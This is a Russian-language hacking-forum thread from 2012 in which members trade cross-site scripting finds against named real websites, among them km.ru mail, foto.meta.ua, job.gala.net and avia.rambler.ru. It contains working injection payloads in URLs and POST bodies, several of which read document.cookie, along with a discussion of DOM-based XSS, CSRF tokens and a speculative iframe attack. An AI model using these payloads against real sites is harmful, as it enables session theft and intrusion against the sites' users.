 |
|

31.03.2012, 12:48
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от eclipse
Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (
ссылка
)
Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл
|
|
|

31.03.2012, 13:32
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами:
8103926
Репутация:
85
|
|
Сообщение от M_script
Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл
Сообщение от None
function ajaxComment(){ //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;
Действительно, херня какая-то ))))
Оказывается при выполнении функции отправки комментария и происходит инжект, в код который занимается собственно отправкой:
Код:
function ajaxComment(){ //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;
var author = document.getElementsByName('author')[1].value;
var message = document.getElementsByName('comment')[0].value;
var csrf = document.getElementsByName('csrfmiddlewaretoken')[0].value;
$.ajax({
type: "POST",
url: document.location.href,
data: "csrfmiddlewaretoken="+csrf+"&author="+author+"&comment="+message,
success: function() {
$('#comment').hide().append(''+author+' написал'+message+'').show('slow');
}
});
return false;
}
И хотя данные после отправки на php чистятся, сама возможность инъекции присутствует, но ее нельзя удаленно эксплуатировать, потому что страница защищена опять такие тем самым токеном, если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос
А моя статья оказывается тут нифига не поможет, потому что она нужна когда есть удаленный xss и требуется csrf, а у нас нет удаленного xss ))
|
|
|

31.03.2012, 13:57
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от eclipse
Вывод: Java Script инъекция есть
Но человек должен вставить свой код и нажать кнопку отправки. Есть идеи насчет практической реализации атаки?
Сообщение от eclipse
если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос
Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.
|
|
|

31.03.2012, 14:14
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами:
8103926
Репутация:
85
|
|
Сообщение от None
Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.
Я тоже самое сказал)) Имелось ввиду что можно было бы кликабельную пассивку получить..
Насчет практики, нет, не юзабельно (удаленно)
Хотя, теоретически))
Можно:
1.отправить человека на свой php скрипт
2.скрипт выводит iframe с античатом
3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент
4.инжект выполнится))
Ну в общем это из раздела фантастики))))
|
|
|

31.03.2012, 15:21
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от eclipse
2.скрипт выводит iframe с античатом
3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент
Не получится. http://ru.wikipedia.org/wiki/Правило_ограничения_домена
|
|
|

31.03.2012, 15:52
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
km.ru
После ошибки авторизации на главной странице, вы будете перенаправлены на http://n.mail.km.ru/extra/form. Не фильтруется поле "Пароль".
Post:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]user_login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]support[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]user_domain[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]freemail[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]user_password[/COLOR][COLOR="#007700"]=%[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3E[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3Cscript[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3Ealert[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]28[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]27Hello[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]2C[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]world[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3B[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3C[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]2Fscript[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3E[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]op[/COLOR][COLOR="#007700"]=%[/COLOR][COLOR="#0000BB"]D0[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]92[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]D0[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]BE[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]D0[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]B9[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]D1[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]82[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]D0[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]B8[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]form_build_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]form[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]a080de13ffb21494853525a2e1c6cf72[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_imap_mail_extra_login_form[/COLOR][/COLOR]
Утверждение верно для всех доменов, кроме km.ru (@freemail.ru, @bossmail.ru etc.)
|
|
|

08.04.2012, 19:16
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Активная xss в теле письма на 59.ru
Активная xss в теле письма на http://59.ru/
Почта
Xss код
Далее я сделал бонус,автоудаление письма
Код автоудаление письма
Я бы этот код запихал в JS фаил и вызвал через xss.
Но есть но,нужно сделать очистку корзины,поэтому надо делать через Js фаил.
PS создайте тему с активными xss в теле письма пжл.
|
|
|

14.04.2012, 15:21
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Активная xss на foto.meta.ua
Активка тут http://foto.meta.ua/4552903.image
Уязвимый код тэги
" onmouseover='alert(document.cookie)'
Выполняется принаведении на тэги.
|
|
|

26.04.2012, 21:23
|
|
Новичок
Регистрация: 22.04.2012
Сообщений: 28
С нами:
7398326
Репутация:
0
|
|
job.gala.net
http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert(' xz che za')
|
|
|

15.07.2012, 12:42
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами:
9752260
Репутация:
150
|
|
http://avia.rambler.ru/anytime?max_days=%3Cimg%20src=x:%20onerror=alert(d ocument.cookie)%3E
http://avia.rambler.ru/anytime?min_days=%3Cimg%20src=x:%20onerror=alert(d ocument.cookie)%3E
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|